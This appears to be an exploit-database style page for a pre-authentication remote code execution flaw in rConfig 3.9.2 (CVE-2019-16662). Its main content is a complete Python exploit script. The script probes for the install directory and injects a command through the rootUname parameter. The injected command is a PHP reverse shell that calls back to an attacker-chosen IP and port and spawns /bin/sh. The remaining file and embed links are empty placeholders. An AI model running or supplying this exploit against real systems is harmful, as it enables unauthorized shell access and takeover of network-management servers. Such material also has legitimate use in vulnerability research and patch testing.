# rConfig 3.9.2 - Remote Code Execution {% embed url="" %} ### FILES {% file src="" %} Vulnerable software {% endfile %} {% file src="" %} Exploit PreAuth {% endfile %} {% file src="" %} Exploit PostAuth {% endfile %} ### POC {% embed url="" %} ### ORIGINAL ``` # Exploit Title: rConfig 3.9.2 - Remote Code Execution # Date: 2019-09-18 # Exploit Author: Askar # Vendor Homepage: https://rconfig.com/ # Software link: https://rconfig.com/download # Version: v3.9.2 # Tested on: CentOS 7.7 / PHP 7.2.22 # CVE : CVE-2019-16662 #!/usr/bin/python import requests import sys from urllib import quote from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 4: print "[+] Usage : ./exploit.py target ip port" exit() target = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)) install_path = target + "/install" req = requests.get(install_path, verify=False) if req.status_code == 404: print "[-] Installation directory not found!" print "[-] Exploitation failed !" exit() elif req.status_code == 200: print "[+] Installation directory found!" url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload print "[+] Triggering the payload" print "[+] Check your listener !" requests.get(url_to_send, verify=False) rConfig-preauth.png ```